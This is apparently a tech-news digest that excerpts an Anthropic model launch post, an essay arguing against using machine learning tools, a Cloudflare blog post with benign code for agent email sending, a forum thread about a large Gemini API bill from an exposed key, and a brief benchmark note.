10 interesting stories served every morning and every evening.
Our latest model, Claude Opus 4.7, is now generally available. Opus 4.7 is a notable improvement on Opus 4.6 in advanced software engineering, with particular gains on the most difficult tasks. Users report being able to hand off their hardest coding work—the kind that previously needed close supervision—to Opus 4.7 with confidence. Opus 4.7 handles complex, long-running tasks with rigor and consistency, pays precise attention to instructions, and devises ways to verify its own outputs before reporting back.
The model also has substantially better vision: it can see images in greater resolution. It’s more tasteful and creative when completing professional tasks, producing higher-quality interfaces, slides, and docs. And—although it is less broadly capable than our most powerful model, Claude Mythos Preview—it shows better results than Opus 4.6 across a range of benchmarks:
Last week we announced Project Glasswing, highlighting the risks—and benefits—of AI models for cybersecurity. We stated that we would keep Claude Mythos Preview’s release limited and test new cyber safeguards on less capable models first. Opus 4.7 is the first such model: its cyber capabilities are not as advanced as those of Mythos Preview (indeed, during its training we experimented with efforts to differentially reduce these capabilities). We are releasing Opus 4.7 with safeguards that automatically detect and block requests that indicate prohibited or high-risk cybersecurity uses. What we learn from the real-world deployment of these safeguards will help us work towards our eventual goal of a broad release of Mythos-class models.
Security professionals who wish to use Opus 4.7 for legitimate cybersecurity purposes (such as vulnerability research, penetration testing, and red-teaming) are invited to join our new Cyber Verification Program.
Opus 4.7 is available today across all Claude products and our API, Amazon Bedrock, Google Cloud’s Vertex AI, and Microsoft Foundry. Pricing remains the same as Opus 4.6: $5 per million input tokens and $25 per million output tokens. Developers can use claude-opus-4-7 via the Claude API.
Claude Opus 4.7 has garnered strong feedback from our early-access testers:
In early testing, we’re seeing the potential for a significant leap for our developers with Claude Opus 4.7. It catches its own logical faults during the planning phase and accelerates execution, far beyond previous Claude models. As a financial technology platform serving millions of consumers and businesses at significant scale, this combination of speed and precision could be game-changing: accelerating development velocity for faster delivery of the trusted financial solutions our customers rely on every day.
Anthropic has already set the standard for coding models, and Claude Opus 4.7 pushes that further in a meaningful way as the state-of-the-art model on the market. In our internal evals, it stands out not just for raw capability, but for how well it handles real-world async workflows—automations, CI/CD, and long-running tasks. It also thinks more deeply about problems and brings a more opinionated perspective, rather than simply agreeing with the user.
Claude Opus 4.7 is the strongest model Hex has evaluated. It correctly reports when data is missing instead of providing plausible-but-incorrect fallbacks, and it resists dissonant-data traps that even Opus 4.6 falls for.
It’s a more intelligent, more efficient Opus 4.6: low-effort Opus 4.7 is roughly equivalent to medium-effort Opus 4.6.
On our 93-task coding benchmark, Claude Opus 4.7 lifted resolution by 13% over Opus 4.6, including four tasks neither Opus 4.6 nor Sonnet 4.6 could solve. Combined with faster median latency and strict instruction following, it’s particularly meaningful for complex, long-running coding workflows. It cuts the friction from those multi-step tasks so developers can stay in the flow and focus on building.
Based on our internal research-agent benchmark, Claude Opus 4.7 has the strongest efficiency baseline we’ve seen for multi-step work. It tied for the top overall score across our six modules at 0.715 and delivered the most consistent long-context performance of any model we tested. On General Finance—our largest module—it improved meaningfully on Opus 4.6, scoring 0.813 versus 0.767, while also showing the best disclosure and data discipline in the group. And on deductive logic, an area where Opus 4.6 struggled, Opus 4.7 is solid.
Claude Opus 4.7 extends the limit of what models can do to investigate and get tasks done. Anthropic has clearly optimized for sustained reasoning over long runs, and it shows with market-leading performance. As engineers shift from working 1:1 with agents to managing them in parallel, this is exactly the kind of frontier capability that unlocks new workflows.
We’re seeing major improvements in Claude Opus 4.7’s multimodal understanding, from reading chemical structures to interpreting complex technical diagrams. The higher resolution support is helping Solve Intelligence build best-in-class tools for life sciences patent workflows, from drafting and prosecution to infringement detection and invalidity charting.
Claude Opus 4.7 takes long-horizon autonomy to a new level in Devin. It works coherently for hours, pushes through hard problems rather than giving up, and unlocks a class of deep investigation work we couldn’t reliably run before.
For Replit, Claude Opus 4.7 was an easy upgrade decision. For the work our users do every day, we observed it achieving the same quality at lower cost—more efficient and precise at tasks like analyzing logs and traces, finding bugs, and proposing fixes. Personally, I love how it pushes back during technical discussions to help me make better decisions. It really feels like a better coworker.
Claude Opus 4.7 demonstrates strong substantive accuracy on BigLaw Bench for Harvey, scoring 90.9% at high effort with better reasoning calibration on review tables and noticeably smarter handling of ambiguous document editing tasks. It correctly distinguishes assignment provisions from change-of-control provisions, a task that has historically challenged frontier models. Substance was consistently rated as a strength across our evaluations: correct, thorough, and well-cited.
Claude Opus 4.7 is a very impressive coding model, particularly for its autonomy and more creative reasoning. On CursorBench, Opus 4.7 is a meaningful jump in capabilities, clearing 70% versus Opus 4.6 at 58%.
For complex multi-step workflows, Claude Opus 4.7 is a clear step up: plus 14% over Opus 4.6 at fewer tokens and a third of the tool errors. It’s the first model to pass our implicit-need tests, and it keeps executing through tool failures that used to stop Opus cold. This is the reliability jump that makes Notion Agent feel like a true teammate.
In our evals, we saw a double-digit jump in accuracy of tool calls and planning in our core orchestrator agents. As users leverage Hebbia to plan and execute on use cases like retrieval, slide creation, or document generation, Claude Opus 4.7 shows the potential to improve agent decision-making in these workflows.
On Rakuten-SWE-Bench, Claude Opus 4.7 resolves 3x more production tasks than Opus 4.6, with double-digit gains in Code Quality and Test Quality. This is a meaningful lift and a clear upgrade for the engineering work our teams are shipping every day.
For CodeRabbit’s code review workloads, Claude Opus 4.7 is the sharpest model we’ve tested. Recall improved by over 10%, surfacing some of the most difficult-to-detect bugs in our most complex PRs, while precision remained stable despite the increased coverage. It’s a bit faster than GPT-5.4 xhigh on our harness, and we’re lining it up for our heaviest review work at launch.
For Genspark’s Super Agent, Claude Opus 4.7 nails the three production differentiators that matter most: loop resistance, consistency, and graceful error recovery. Loop resistance is the most critical. A model that loops indefinitely on 1 in 18 queries wastes compute and blocks users. Lower variance means fewer surprises in prod. And Opus 4.7 achieves the highest quality-per-tool-call ratio we’ve measured.
Claude Opus 4.7 is a meaningful step up for Warp. Opus 4.6 is one of the best models out there for developers, and this model is measurably more thorough on top of that. It passed Terminal Bench tasks that prior Claude models had failed, and worked through a tricky concurrency bug Opus 4.6 couldn’t crack. For us, that’s the signal.
Claude Opus 4.7 is the best model in the world for building dashboards and data-rich interfaces. The design taste is genuinely surprising—it makes choices I’d actually ship. It’s my default daily driver now.
Claude Opus 4.7 is the most capable model we’ve tested at Quantium. Evaluated against leading AI models through our proprietary benchmarking solution, the biggest gains showed up where they matter most: reasoning depth, structured problem-framing, and complex technical work. Fewer corrections, faster iterations, and stronger outputs to solve the hardest problems our clients bring us.
Claude Opus 4.7 feels like a real step up in intelligence. Code quality is noticeably improved: it cuts out the meaningless wrapper functions and fallback scaffolding that used to pile up, and fixes its own code as it goes. It’s the cleanest jump we’ve seen since the move from Sonnet 3.7 to the Claude 4 series.
For the computer-use work that sits at the heart of XBOW’s autonomous penetration testing, the new Claude Opus 4.7 is a step change: 98.5% on our visual-acuity benchmark versus 54.5% for Opus 4.6. Our single biggest Opus pain point effectively disappeared, and that unlocks its use for a whole class of work where we couldn’t use it before.
Claude Opus 4.7 is a solid upgrade with no regressions for Vercel. It’s phenomenal on one-shot coding tasks, more correct and complete than Opus 4.6, and noticeably more honest about its own limits. It even does proofs on systems code before starting work, which is new behavior we haven’t seen from earlier Claude models.
Claude Opus 4.7 is very strong and outperforms Opus 4.6 with a 10% to 15% lift in task success for Factory Droids, with fewer tool errors and more reliable follow-through on validation steps. It carries work all the way through instead of stopping halfway, which is exactly what enterprise engineering teams need.
Claude Opus 4.7 autonomously built a complete Rust text-to-speech engine from scratch—neural model, SIMD kernels, browser demo—then fed its own output through a speech recognizer to verify it matched the Python reference. Months of senior engineering, delivered autonomously. The step up from Opus 4.6 is clear, and the codebase is public.
Claude Opus 4.7 passed three TBench tasks that prior Claude models couldn’t, and it’s landing fixes our previous best model missed, including a race condition. It demonstrates strong precision in identifying real issues, and surfaces important findings that other models either gave up on or didn’t resolve. In Qodo’s real-world code review benchmark, we observed top-tier precision.
On Databricks’ OfficeQA Pro, Claude Opus 4.7 shows meaningfully stronger document reasoning, with 21% fewer errors than Opus 4.6 when working with source information. Across our agentic reasoning over data benchmarks, it is the best-performing Claude model for enterprise document analysis.
For Ramp, Claude Opus 4.7 stands out in agent-team workflows. We’re seeing stronger role fidelity, instruction-following, coordination, and complex reasoning, especially on engineering tasks that span tools, codebases, and debugging context. Compared with Opus 4.6, it needs much less step-by-step guidance, helping us scale the internal agent workflows our engineering teams run.
Claude Opus 4.7 is measurably better than Opus 4.6 for Bolt’s longer-running app-building work, up to 10% better in the best cases, without the regressions we’ve come to expect from very agentic models. It pushes the ceiling on what our users can ship in a single session.
Below are some highlights and notes from our early testing of Opus 4.7:
Instruction following. Opus 4.7 is substantially better at following instructions. Interestingly, this means that prompts written for earlier models can sometimes now produce unexpected results: where previous models interpreted instructions loosely or skipped parts entirely, Opus 4.7 takes the instructions literally. Users should re-tune their prompts and harnesses accordingly.
Improved multimodal support. Opus 4.7 has better vision for high-resolution images: it can accept images up to 2,576 pixels on the long edge (~3.75 megapixels), more than three times as many pixels as prior Claude models. This opens up a wealth of multimodal uses that depend on fine visual detail: computer-use agents reading dense screenshots, data extraction from complex diagrams, and work that needs pixel-perfect references.
Real-world work. As well as its state-of-the-art score on the Finance Agent evaluation (see table above), our internal testing showed Opus 4.7 to be a more effective finance analyst than Opus 4.6, producing rigorous analyses and models, more professional presentations, and tighter integration across tasks. Opus 4.7 is also state-of-the-art on GDPval-AA, a third-party evaluation of economically valuable knowledge work across finance, legal, and other domains.
Memory. Opus 4.7 is better at using file system-based memory. It remembers important notes across long, multi-session work, and uses them when moving on to new tasks, which as a result need less up-front context.
The charts below display more evaluation results from our pre-release testing, across a range of different domains:
Overall, Opus 4.7 shows a similar safety profile to Opus 4.6: our evaluations show low rates of concerning behavior such as deception, sycophancy, and cooperation with misuse. On some measures, such as honesty and resistance to malicious “prompt injection” attacks, Opus 4.7 is an improvement on Opus 4.6; on others (such as its tendency to give overly detailed harm-reduction advice on controlled substances), Opus 4.7 is modestly weaker. Our alignment assessment concluded that the model is “largely well-aligned and trustworthy, though not fully ideal in its behavior”. Note that Mythos Preview remains the best-aligned model we’ve trained according to our evaluations. Our safety evaluations are discussed in full in the Claude Opus 4.7 System Card.
Overall misaligned behavior score from our automated behavioral audit. On this evaluation, Opus 4.7 is a modest improvement on Opus 4.6 and Sonnet 4.6, but Mythos Preview still shows the lowest rates of misaligned behavior.
In addition to Claude Opus 4.7 itself, we’re launching the following updates:
More effort control: Opus 4.7 introduces a new xhigh (“extra high”) effort level between high and max, giving users finer control over the tradeoff between reasoning and latency on hard problems. In Claude Code, we’ve raised the default effort level to xhigh for all plans. When testing Opus 4.7 for coding and agentic use cases, we recommend starting with high or xhigh effort.
On the Claude Platform (API): as well as support for higher-resolution images, we’re also launching task budgets in public beta, giving developers a way to guide Claude’s token spend so it can prioritize work across longer runs.
In Claude Code: the new /ultrareview slash command produces a dedicated review session that reads through changes and flags bugs and design issues that a careful reviewer would catch. We’re giving Pro and Max Claude Code users three free ultrareviews to try it out. In addition, we’ve extended auto mode to Max users. Auto mode is a new permissions option where Claude makes decisions on your behalf, meaning that you can run longer tasks with fewer interruptions—and with less risk than if you had chosen to skip all permissions.
Opus 4.7 is a direct upgrade to Opus 4.6, but two changes are worth planning for because they affect token usage. First, Opus 4.7 uses an updated tokenizer that improves how the model processes text. The tradeoff is that the same input can map to more tokens—roughly 1.0–1.35× depending on the content type. Second, Opus 4.7 thinks more at higher effort levels, particularly on later turns in agentic settings. This improves its reliability on hard problems, but it does mean it produces more output tokens. Users can control token usage in various ways: by using the effort parameter, adjusting their task budgets, or prompting the model to be more concise. In our own testing, the net effect is favorable—token usage across all effort levels is improved on an internal coding evaluation, as shown below—but we recommend measuring the difference on real traffic. We’ve written a migration guide that provides further advice on upgrading from Opus 4.6 to Opus 4.7.
Score on an internal agentic coding evaluation as a function of token usage at each effort level. In this evaluation, the model works autonomously from a single user prompt, and results may not be representative of token usage in interactive coding. See the migration guide for more on tuning effort levels.
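For orientation, here is a hedged sketch of what selecting the new model and an explicit effort level might look like over the Messages API. The endpoint, headers, and model ID (claude-opus-4-7) come from the announcement and the standard Claude API shape; the thinking_level parameter name and its accepted values are assumptions, so verify them against the migration guide before relying on this:

// Sketch only: the thinking_level field name and values are assumptions.
const resp = await fetch("https://api.anthropic.com/v1/messages", {
  method: "POST",
  headers: {
    "content-type": "application/json",
    "x-api-key": process.env.ANTHROPIC_API_KEY!, // assumes Node with the key in the environment
    "anthropic-version": "2023-06-01",
  },
  body: JSON.stringify({
    model: "claude-opus-4-7",
    max_tokens: 4096,
    thinking_level: "xhigh", // assumed values: low | medium | high | xhigh | max
    messages: [{ role: "user", content: "Find and fix the race condition in this module." }],
  }),
});
console.log(await resp.json());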
...
Read the original on www.anthropic.com »
Some readers are undoubtedly upset that I have not devoted more space to the wonders of machine learning—how amazing LLMs are at code generation, how incredible it is that Suno can turn hummed melodies into polished songs. But this is not an article about how fast or convenient it is to drive a car. We all know cars are fast. I am trying to ask what will happen to the shape of cities.
The personal automobile reshaped streets, all but extinguished urban horses and their waste, supplanted local transit and interurban railways, germinated new building typologies, decentralized cities, created exurban sprawl, reduced incidental social contact, gave rise to the Interstate Highway System (bulldozing Black communities in the process), gave everyone lead poisoning, and became a leading cause of death among young people. Many parts of the US are highly car-dependent, even though a third of us don’t drive. As a driver, cyclist, transit rider, and pedestrian, I think about this legacy every day: how so much of our lives are shaped by the technology of personal automobiles, and the specific way the US uses them.
I want you to think about “AI” in this sense.
Some of our possible futures are grim, but manageable. Others are downright terrifying, in which large numbers of people lose their homes, health, or lives. I don’t have a strong sense of what will happen, but the space of possible futures feels much broader in 2026 than it did in 2022, and most of those futures feel bad.
Much of the bullshit future is already here, and I am profoundly tired of it. There is slop in my search results, at the gym, at the doctor’s office. Customer service, contractors, and engineers use LLMs to blindly lie to me. The electric company has hiked our rates and says data centers are to blame. LLM scrapers take down the web sites I run and make it harder to access the services I rely on. I watch synthetic videos of suffering animals and stare at generated web pages which lie about police brutality. There is LLM spam in my inbox and synthetic CSAM on my moderation dashboard. I watch people outsource their work, food, travel, art, even relationships to ChatGPT. I read chatbots lining the delusional warrens of mental health crises.
I am asked to analyze vaporware and to disprove nonsensical claims. I wade through voluminous LLM-generated pull requests. Prospective clients ask Claude to do the work they might have hired me for. Thankfully Claude’s code is bad, but that could change, and that scares me. I worry about losing my home. I could retrain, but my core skills—reading, thinking, and writing—are squarely in the blast radius of large language models. I imagine going to school to become an architect, just to watch ML eat that field too.
It is deeply alienating to see so many of my peers wildly enthusiastic about ML’s potential applications, and using it personally. Governments and industry seem all-in on “AI”, and I worry that by doing so, we’re hastening the arrival of unpredictable but potentially devastating consequences—personal, cultural, economic, and humanitarian.
I’ve thought about this a lot over the last few years, and I think the best response is to stop. ML assistance reduces our performance and persistence, and denies us both the muscle memory and deep theory-building that comes with working through a task by hand: the cultivation of what James C. Scott would call metis. I have never used an LLM for my writing, software, or personal life, because I care about my ability to write well, reason deeply, and stay grounded in the world. If I ever adopt ML tools in more than an exploratory capacity, I will need to take great care. I also try to minimize what I consume from LLMs. I read cookbooks written by human beings, I trawl through university websites to identify wildlife, and I talk through my problems with friends.
I think you should do the same.
Refuse to insult your readers: think your own thoughts and write your own words. Call out people who send you slop. Flag ML hazards at work and with friends. Stop paying for ChatGPT at home, and convince your company not to sign a deal for Gemini. Form or join a labor union, and push back against management demands that you adopt Copilot—after all, it’s for entertainment purposes only. Call your members of Congress and demand aggressive regulation which holds ML companies responsible for their carbon and digital emissions. Advocate against tax breaks for ML datacenters. If you work at Anthropic, xAI, etc., you should think seriously about your role in making the future. To be frank, I think you should quit your job.
I don’t think this will stop ML from advancing altogether: there are still lots of people who want to make it happen. It will, however, slow them down, and this is good. Today’s models are already very capable. It will take time for the effects of the existing technology to be fully felt, and for culture, industry, and government to adapt. Each day we delay the advancement of ML models buys time to learn how to manage technical debt and errors introduced in legal filings. Another day to prepare for ML-generated CSAM, sophisticated fraud, obscure software vulnerabilities, and AI Barbie. Another day for workers to find new jobs.
Staving off ML will also assuage your conscience over the coming decades. As someone who once quit an otherwise good job on ethical grounds, I feel good about that decision. I think you will too.
And if I’m wrong, we can always build it later.
Despite feeling a bitter distaste for this generation of ML systems and the people who brought them into existence, they do seem useful. I want to use them. I probably will at some point.
For example, I’ve got these color-changing lights. They speak a protocol I’ve never heard of, and I have no idea where to even begin. I could spend a month digging through manuals and working it out from scratch—or I could ask an LLM to write a client library for me. The security consequences are minimal, it’s a constrained use case that I can verify by hand, and I wouldn’t be pushing tech debt on anyone else. I still write plenty of code, and I could stop any time. What would be the harm?
Many friends contributed discussion, reading material, and feedback on this article. My heartfelt thanks to Peter Alvaro, Kevin Amidon, André Arko, Taber Bain, Silvia Botros, Daniel Espeset, Julia Evans, Brad Greenlee, Coda Hale, Marc Hedlund, Sarah Huffman, Dan Mess, Nelson Minar, Alex Rasmussen, Harper Reed, Daliah Saper, Peter Seibel, Rhys Seiffe, and James Turnbull.
This piece, like most all my words and software, was written by hand—mainly in Vim. I composed a Markdown outline in a mix of headers, bullet points, and prose, then reorganized it in a few passes. With the structure laid out, I rewrote the outline as prose, typeset with Pandoc. I went back to make substantial edits as I wrote, then made two full edit passes on typeset PDFs. For the first I used an iPad and stylus, for the second, the traditional pen and paper, read aloud.
I circulated the resulting draft among friends for their feedback before publication. Incisive ideas and delightful turns of phrase may be attributed to them; any errors or objectionable viewpoints are, of course, mine alone.
...
Read the original on aphyr.com »
Email is the most accessible interface in the world. It is ubiquitous. There’s no need for a custom chat application, no custom SDK for each channel. Everyone already has an email address, which means everyone can already interact with your application or agent. And your agent can interact with anyone.
If you are building an application, you already rely on email for signups, notifications, and invoices. Increasingly, it is not just your application logic that needs this channel. Your agents do, too. During our private beta, we talked to developers who are building exactly this: customer support agents, invoice processing pipelines, account verification flows, multi-agent workflows. All built on top of email. The pattern is clear: email is becoming a core interface for agents, and developers need infrastructure purpose-built for it.
Cloudflare Email Service is that piece. With Email Routing, you can receive email to your application or agent. With Email Sending, you can reply to emails or send outbounds to notify your users when your agents are done doing work. And with the rest of the developer platform, you can build a full email client, and the Agents SDK provides an onEmail hook as native functionality.
Today, as part of Agents Week, Cloudflare Email Service is entering public beta, allowing any application and any agent to send emails. We are also completing the toolkit for building email-native agents:
Email Sending binding, available from your Workers and the Agents SDK
Email Sending graduates from private beta to public beta today. You can now send transactional emails directly from Workers with a native Workers binding — no API keys, no secrets management.
export default {
  async fetch(request, env, ctx) {
    // Send a transactional email through the EMAIL binding
    await env.EMAIL.send({
      to: "[email protected]",
      from: "[email protected]",
      subject: "Your order has shipped",
      text: "Your order #1234 has shipped and is on its way."
    });
    return new Response("Email sent");
  }
};
Or send from any platform, any language, using the REST API and our TypeScript, Python, and Go SDKs:
  --header "Content-Type: application/json" \
  --data '{
    "to": "[email protected]",
    "from": "[email protected]",
    "subject": "Your order has shipped",
    "text": "Your order #1234 has shipped and is on its way."
  }'
Sending email that actually reaches inboxes usually means wrestling with SPF, DKIM, and DMARC records. When you add your domain to Email Service, we configure all of it automatically. Your emails are authenticated and delivered, not flagged as spam. And because Email Service is a global service built on Cloudflare’s network, your emails are delivered with low latency anywhere in the world.
Combined with Email Routing, which has been free and available for years, you now have complete bidirectional email within a single platform. Receive an email, process it in a Worker, and reply, all without leaving Cloudflare.
For the full deep dive on Email Sending, refer to our Birthday Week announcement. The rest of this post describes what Email Service unlocks for agents.
The Agents SDK for building agents on Cloudflare already has a first-class onEmail hook for receiving and processing inbound email. But until now, your agent could only reply synchronously, or send emails to members of your Cloudflare account.
With Email Sending, that constraint is gone. This is the difference between a chatbot and an agent.
Email agents receive a message, orchestrate work across the platform, and respond asynchronously.
A chatbot responds in the moment or not at all. An agent thinks, acts, and communicates on its own timeline. With Email Sending, your agent can receive a message, spend an hour processing data, check three other systems, and then reply with a complete answer. It can schedule follow-ups. It can escalate when it detects an edge case. It can operate independently. In other words: it can actually do work, not just answer questions.
Here’s what a support agent looks like with the full pipeline — receive, persist, and reply:
import { Agent, routeAgentEmail } from "agents";
import { createAddressBasedEmailResolver, type AgentEmail } from "agents/email";
import PostalMime from "postal-mime";

export class SupportAgent extends Agent {
  async onEmail(email: AgentEmail) {
    const raw = await email.getRaw();
    const parsed = await PostalMime.parse(raw);

    // Persist in agent state
    this.setState({
      ...this.state,
      ticket: { from: email.from, subject: parsed.subject, body: parsed.text, messageId: parsed.messageId },
    });

    // Kick off a long-running background agent task here,
    // or place a message on a Queue to be handled by another Worker.

    // Reply here or in another Worker handler, like a Queue handler
    await this.sendEmail({
      binding: this.env.EMAIL,
      fromName: "Support Agent",
      from: "[email protected]",
      to: this.state.ticket.from,
      inReplyTo: this.state.ticket.messageId,
      subject: `Re: ${this.state.ticket.subject}`,
      text: `Thanks for reaching out. We received your message about "${this.state.ticket.subject}" and will follow up shortly.`
    });
  }
}

export default {
  async email(message, env) {
    await routeAgentEmail(message, env, {
      resolver: createAddressBasedEmailResolver("SupportAgent"),
    });
  },
} satisfies ExportedHandler;
If you’re new to the Agents SDK’s email capabilities, here’s what’s happening under the hood.
Each agent gets its own identity from a single domain. The address-based resolver routes [email protected] to a “support” agent instance, [email protected] to a “sales” instance, and so on. You don’t need to provision separate inboxes — the routing is built into the address. You can even use sub-addressing ([email protected]) to route to different agent namespaces and instances.
State persists across emails. Because agents are backed by Durable Objects, calling this.setState() means your agent remembers conversation history, contact information, and context across sessions. The inbox becomes the agent’s memory, without needing a separate database or vector store.
Secure reply routing is built in. When your agent sends an email and expects a reply, you can sign the routing headers with HMAC-SHA256 so that replies route back to the exact agent instance that sent the original message. This prevents attackers from forging headers to route emails to arbitrary agent instances — a security concern that most “email for agents” solutions haven’t addressed.
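To make that concrete, here is a minimal sketch of the idea behind signed reply routing, written against the Web Crypto API available in Workers. This is an illustration of the mechanism, not the Agents SDK's actual implementation; the function names and header format are hypothetical:

// Hypothetical sketch: sign the agent instance ID so inbound replies can be
// verified before routing. Not the SDK's real API.
const encoder = new TextEncoder();

async function hmacKey(secret: string): Promise<CryptoKey> {
  return crypto.subtle.importKey(
    "raw",
    encoder.encode(secret),
    { name: "HMAC", hash: "SHA-256" },
    false,
    ["sign"],
  );
}

// Produce a routing header value of the form "<instanceId>.<hex MAC>"
async function signRoutingHeader(secret: string, instanceId: string): Promise<string> {
  const mac = await crypto.subtle.sign("HMAC", await hmacKey(secret), encoder.encode(instanceId));
  const hex = [...new Uint8Array(mac)].map((b) => b.toString(16).padStart(2, "0")).join("");
  return `${instanceId}.${hex}`;
}

// On a reply, recompute the MAC; only route to the instance if it matches.
async function verifyRoutingHeader(secret: string, headerValue: string): Promise<string | null> {
  const instanceId = headerValue.split(".")[0];
  const expected = await signRoutingHeader(secret, instanceId);
  // A constant-time comparison is advisable in production; simple equality shown for brevity
  return expected === headerValue ? instanceId : null;
}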
This is the complete email agent pipeline that teams are building from scratch elsewhere: receive email, parse it, classify it, persist state, kick off async workflows, reply or escalate — all within a single Agent class, deployed globally on Cloudflare’s network.
Email Service isn’t only for agents running on Cloudflare. Agents run everywhere, whether it’s coding agents like Claude Code, Cursor, or Copilot running locally or in remote environments, or production agents running in containers or external clouds. They all need to send email from those environments. We’re shipping three integrations that make Email Service accessible to any agent, regardless of where it runs.
Email is now available through the Cloudflare MCP server, the same Code Mode-powered server that gives agents access to the entire Cloudflare API. With this MCP server, your agent can discover and call the Email endpoints to send and configure emails. You can send an email with a simple prompt:
“Send me a notification email at [email protected] from my staging domain when the build completes”
For agents running on a computer or a sandbox with bash access, the Wrangler CLI solves the MCP context window problem that we discussed in the Code Mode blog post — tool definitions can consume tens of thousands of tokens before your agent even starts processing a single message. With Wrangler, your agent starts with near-zero context overhead and discovers capabilities on demand through `–help` commands. Here is how your agent can send an email via Wrangler:
wrangler email send \
  --to "[email protected]" \
  --from "[email protected]" \
  --subject "Build completed" \
  --text "The build passed. Deployed to staging."
Regardless of whether you give your agent the Cloudflare MCP or the Wrangler CLI, your agent will be able to now send emails on your behalf with just a prompt.
We are also publishing a Cloudflare Email Service skill. It gives your agents complete guidance: configuring the Workers binding, sending emails via the REST API or SDKs, handling inbound email with Email Routing configuration, building with Agents SDK, and managing email through Wrangler CLI or MCP. It also covers deliverability best practices and how to craft good transactional emails that land in inboxes rather than spam. Drop it into your project and your coding agent has everything needed to build production-ready email on Cloudflare.
During the private beta, we also experimented with email agents. It became clear that you often want to keep the human-in-the-loop element to review emails and see what the agent is doing. The best way to do that is to have a fully featured email client with agent automations built-in.
That’s why we built Agentic Inbox: a reference application with full conversation threading, email rendering, receiving and storing emails and their attachments, and automatically replying to emails. It includes a dedicated MCP server built-in, so external agents can draft emails for your review before sending from your agentic-inbox.
We’re open-sourcing Agentic Inbox as a reference application for how to build a full email application using Email Routing for inbound, Email Sending for outbound, Workers AI for classification, R2 for attachments, and Agents SDK for stateful agent logic. You can deploy it today to get a full inbox, email client and agent for your emails, with the click of a button.
We want email agent tooling to be composable and reusable. Rather than every team rebuilding the same inbound-classify-reply pipeline, start with this reference application. Fork it, extend it, use it as a starting point for your own email agents that fit your workflows.
Email is where the world’s most important workflows live, but for agents, it has often been a difficult channel to reach. With Email Sending now in public beta, Cloudflare Email Service becomes a complete platform for bidirectional communication, making the inbox a first-class interface for your agents.
Whether you’re building a support agent that meets customers in their inbox or a background process that keeps your team updated in real time, your agents now have a seamless way to communicate on a global scale. The inbox is no longer a silo. Now it’s one more place for your agents to be helpful.
Try out Email Sending in the Cloudflare Dashboard. Check out the Email Service MCP server and Skills.
...
Read the original on blog.cloudflare.com »
We are looking for guidance regarding an unexpected €54,000+ Gemini API charge that occurred within a few hours after enabling Firebase AI Logic on an existing Firebase project.
We created the project over a year ago and initially used it only for Firebase Authentication. Recently, we added a simple AI feature (generating a web snippet from a text prompt) and enabled Firebase AI Logic.
Shortly after enabling this, we experienced a sudden and extreme spike in Gemini API usage. The traffic was not correlated with our actual users and appeared to be automated. The activity occurred within a short overnight window and stopped once we disabled the API and rotated credentials.
We had a budget alert (€80) and a cost anomaly alert, both of which triggered with a delay of a few hours.
By the time we reacted, costs were already around €28,000.
The final amount settled at €54,000+ due to delayed cost reporting.
This describes our issue in more detail:
Google API Keys Weren’t Secrets. But then Gemini Changed the Rules.
Google spent over a decade telling developers that Google API keys (like those used in Maps, Firebase, etc.) are not secrets. But that’s no longer true.
We worked with Google Cloud support and provided logs and analysis. The charges were classified as valid usage because they originated from our project, and our request for a billing adjustment was ultimately denied.
This usage was clearly anomalous, not user-driven, and does not reflect intended or meaningful consumption of the service.
Has anyone encountered a similar issue after enabling Firebase AI Logic or Gemini?
Are there recommended safeguards beyond App Check, quotas, and moving calls server-side?
Is there any escalation path we may have missed for cases like this?
Any guidance or shared experience would be greatly appreciated.
Hey @zanbezi ! Sorry to hear about this. A few things:
We have billing account caps rolled out to users of the Gemini API, see: https://ai.google.dev/gemini-api/docs/billing#tier-spend-caps, tier 1 users can spend $250 a month and then are cut off by default (there is a 10 minute delay in all of the reporting)
We now support project spend caps. If you want to set a custom spend cap, you can do that too (I have my account set at $50 so I don’t spend too much accidentally when building; the same 10 minute delay applies here too): https://ai.google.dev/gemini-api/docs/billing#project-spend-caps
We are moving to disable the usage of unrestricted API keys in the Gemini API, should have more updates there soon.
We now generate Auth keys by default for new users (more secure key which didn’t exist when the Gemini API was originally created a few years ago) and will have more to share there soon.
You should generally avoid putting a key in client-side code, because if it is exposed, then even with the restrictions above you can incur costs (see the server-side sketch at the end of this list).
In many cases, we can automatically detect when a key is visible on the public web and shut down those keys automatically for security reasons (this happened to me personally, I accidentally pushed my API key to the public API docs and it was shut down in minutes).
By default, keys generated in Google AI Studio are restricted to just the Gemini API, no other services are enabled. However keys generated from other parts of Google Cloud have this cross service capability, you can double check keys and make sure they are restricted for just the resource you need.
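To illustrate the keep-keys-server-side advice above, here is a minimal sketch of a proxy that holds the Gemini key in a server environment variable so it never ships to clients. The endpoint path and model name are illustrative; adapt them to the API version you actually use, and add your own auth and rate limiting:

// Minimal sketch: a server-side proxy so the Gemini key never reaches the client.
export default {
  async fetch(request: Request, env: { GEMINI_API_KEY: string }): Promise<Response> {
    const { prompt } = (await request.json()) as { prompt: string };
    const upstream = await fetch(
      "https://generativelanguage.googleapis.com/v1beta/models/gemini-2.0-flash:generateContent",
      {
        method: "POST",
        headers: {
          "Content-Type": "application/json",
          "x-goog-api-key": env.GEMINI_API_KEY, // stays on the server
        },
        body: JSON.stringify({ contents: [{ parts: [{ text: prompt }] }] }),
      }
    );
    // Pass the upstream response through; enforce auth, quotas, and logging here
    return new Response(upstream.body, { status: upstream.status });
  },
};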
Pls email me and our team can take a look into this case (Lkilpatrick@google.com); we take this all very seriously and have been pushing hard to land all the features mentioned above and more.
We just started the prepaid billing rollout which means you have to pay ahead of time to use the Gemini API, this is rolled out to all new US billing accounts as of yesterday and rolling out globally right now. This is yet another way to give developers more control over their spending / costs and ensure you know what you are signing up for when using the Gemini API.
I hope this helps and sorry for the hassle on this experience, pls email me if there is more to chat about!
Thanks for the detailed response, we really appreciate it. It is good to see that additional safeguards (like spend caps) are being introduced.
I will reach out via email with the details so your team can take a closer look.
Thanks again for taking the time to respond.
Great to see you here Logan. This is the proper way to deal with a fiasco like this one.
We work with companies spending $50K–$50M/year on cloud and see an average 33% overspend. The fix usually isn’t better dashboards — it’s having engineers actually review architecture and code alongside the billing data.
We’ve helped clients cut 25–60% by treating it as an engineering problem, not a reporting one. Happy to share more if useful.
...
Read the original on discuss.ai.google.dev »
For anyone who has been (inadvisably) taking my pelican riding a bicycle benchmark seriously as a robust way to test models, here are pelicans from this morning’s two big model releases—Qwen3.6-35B-A3B from Alibaba and Claude Opus 4.7 from Anthropic.
